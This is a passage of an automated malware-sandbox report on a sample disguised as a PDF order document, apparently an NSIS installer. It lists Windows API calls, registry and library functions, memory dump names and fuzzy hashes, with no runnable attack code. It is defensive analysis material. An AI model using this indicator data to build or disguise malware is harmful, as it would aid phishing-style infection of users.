                                                                                                                                          • Part of subcall function 004051FB: SetWindowTextA.USER32(subterritories,subterritories), ref: 00405269
                                                                                                                                          • Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                                                          • Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                                                          • Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                        • String ID: Clona $
                                                                                                                                        • API String ID: 2987980305-3062373426
                                                                                                                                        • Opcode ID: 31f3efabba134dcde3e73c1716287688f134fa7e0995aad628bd88176131b709
                                                                                                                                        • Instruction ID: b82e27a23205e400b7882a9dda540b85adfac7e99319b749728402aba69a9ded
                                                                                                                                        • Opcode Fuzzy Hash: 31f3efabba134dcde3e73c1716287688f134fa7e0995aad628bd88176131b709
                                                                                                                                        • Instruction Fuzzy Hash: 55213B32500110EBCF207F608F48A5F36B0AF51358F20423BF601B51D0CBBC49829A1E
                                                                                                                                        APIs
                                                                                                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnum$DeleteValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1354259210-0
                                                                                                                                        • Opcode ID: 61b01d759961c4e40bf2e960662e07dc36c2227ae484429a43adcb02bb257662
                                                                                                                                        • Instruction ID: 148915660003aa48eae5eddbcc28bbe782376451a520f9e519856868b1d6a9df
                                                                                                                                        • Opcode Fuzzy Hash: 61b01d759961c4e40bf2e960662e07dc36c2227ae484429a43adcb02bb257662
                                                                                                                                        • Instruction Fuzzy Hash: 8D215771900109BBEF129F90CE89EEE7A7DEF44344F100076FA55B11A0E7B49E54AA68
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00401DCC
                                                                                                                                        • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                                                                                                        • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00401E20
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1849352358-0
                                                                                                                                        • Opcode ID: 4492c83c4d65da0acc651225de8424e6b85cfb3cdfcda7d846524d3670ad2bdd
                                                                                                                                        • Instruction ID: ebfb82876bdf2138dcddadba10df032a250d68975ffa4ffa2b6a0506bdc7ea5a
                                                                                                                                        • Opcode Fuzzy Hash: 4492c83c4d65da0acc651225de8424e6b85cfb3cdfcda7d846524d3670ad2bdd
                                                                                                                                        • Instruction Fuzzy Hash: 7F212872A00109AFCB05DFA4DD85AAEBBB5FB48300F24407EF905F62A1CB389941DB58
                                                                                                                                        APIs
                                                                                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                                        • String ID: !
                                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                                        • Opcode ID: db3aae198123fe1a7288e066631643491dd1161a9dd5b8c68cc845e87539b238
                                                                                                                                        • Instruction ID: 5277f65d77addf964e4e112e3ca2bdcdb488fad455084b9b29b5161e7124752c
                                                                                                                                        • Opcode Fuzzy Hash: db3aae198123fe1a7288e066631643491dd1161a9dd5b8c68cc845e87539b238
                                                                                                                                        • Instruction Fuzzy Hash: 4C216071944208BEEB059FB5D98AAAE7FB5EF44304F20847FF502B61D1D6B88540DB28
                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(0079F568,0079F568,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048BC,000000DF,00000000,00000400,?), ref: 00404A3F
                                                                                                                                        • wsprintfA.USER32 ref: 00404A47
                                                                                                                                        • SetDlgItemTextA.USER32(?,0079F568), ref: 00404A5A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                                        • Opcode ID: ed987abf90c6e27c05c654f7c34a033b58f0c9b6cb29f4e6cc8d7c7430104512
                                                                                                                                        • Instruction ID: 2d600006130e1353e9717e04d579c0b21937dc8f48943746337f7f8a87e4f386
                                                                                                                                        • Opcode Fuzzy Hash: ed987abf90c6e27c05c654f7c34a033b58f0c9b6cb29f4e6cc8d7c7430104512
                                                                                                                                        • Instruction Fuzzy Hash: 5711B7B760412427DB00667D9C45EAF3298DB85378F250237FA66F71D2E978CC2242A9
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004060D4: lstrcpynA.KERNEL32(?,?,00000400,004033F7,Bysamfund,NSIS Error,?,00000007,00000009,0000000B), ref: 004060E1
                                                                                                                                          • Part of subcall function 00405B05: CharNextA.USER32(?,?,007A0970,?,00405B71,007A0970,007A0970,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B13
                                                                                                                                          • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B18
                                                                                                                                          • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B2C
                                                                                                                                        • lstrlenA.KERNEL32(007A0970,00000000,007A0970,007A0970,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BAD
                                                                                                                                        • GetFileAttributesA.KERNEL32(007A0970,007A0970,007A0970,007A0970,007A0970,007A0970,00000000,007A0970,007A0970,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00405BBD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$pz
                                                                                                                                        • API String ID: 3248276644-1633741497
                                                                                                                                        • Opcode ID: 4efc29256ecc737a82cedd05a7c6237be84f99c24c6a7e1b03480747464f6d67
                                                                                                                                        • Instruction ID: 7cbc09aec6071699a8b6d0bfe618f446c080df756954f9e0a70e7bdf69c0a73f
                                                                                                                                        • Opcode Fuzzy Hash: 4efc29256ecc737a82cedd05a7c6237be84f99c24c6a7e1b03480747464f6d67
                                                                                                                                        • Instruction Fuzzy Hash: A6F0C825105D5516C622623A0C05E9F3A64CE8732871A063FF8A1B12D3DF3CB9439D6E
                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403312,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405A72
                                                                                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403312,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405A7B
                                                                                                                                        • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405A8C
                                                                                                                                        Strings
                                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A6C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                        • API String ID: 2659869361-3081826266
                                                                                                                                        • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                                                                        • Instruction ID: 34bed66953ae9f6d257ce18580ddfb03ef3f992d07e6ea95338c5d753b7bd418
                                                                                                                                        • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                                                                        • Instruction Fuzzy Hash: 47D0A7622456307BD20167154C05ECB19088F063047054036F541B2192C73C4C1187FD
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00402E6E
                                                                                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2102729457-0
                                                                                                                                        • Opcode ID: 2c4addb43d5c00204abaef2ddcbdcde683c8282d51b9ea1b9effed1c6012b8ed
                                                                                                                                        • Instruction ID: 07a7c2fcb6e55b04e3e3d34d53389a9772e5beadce82dbb6bf9e24f56b5acc78
                                                                                                                                        • Opcode Fuzzy Hash: 2c4addb43d5c00204abaef2ddcbdcde683c8282d51b9ea1b9effed1c6012b8ed
                                                                                                                                        • Instruction Fuzzy Hash: 91F05E30481624EFC621AB64FE0CA9B7B64BB44B41711893FF085B12F8C77808828BDC
                                                                                                                                        APIs
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 0040519E
                                                                                                                                        • CallWindowProcA.USER32(?,?,?,?), ref: 004051EF
                                                                                                                                          • Part of subcall function 004041A4: SendMessageA.USER32(00010488,00000000,00000000,00000000), ref: 004041B6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                                        • Opcode ID: 34aba529733e3b32ef5863def0a598af0a9d68f7816d72c254ac1b8fca419f55
                                                                                                                                        • Instruction ID: a815c8626c5111ac64f0cf4f46d81bc36f874ce80d1ab61a55fc5c00676d5aef
                                                                                                                                        • Opcode Fuzzy Hash: 34aba529733e3b32ef5863def0a598af0a9d68f7816d72c254ac1b8fca419f55
                                                                                                                                        • Instruction Fuzzy Hash: 1A015E31600608ABEF205F11DD84B9B376AEB84315F244137FA00791D0C7799D62DA69
                                                                                                                                        APIs
                                                                                                                                        • FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,0040382A,00403644,?,?,00000007,00000009,0000000B), ref: 0040386C
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00403873
                                                                                                                                        Strings
                                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403852
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Free$GlobalLibrary
                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                        • API String ID: 1100898210-3081826266
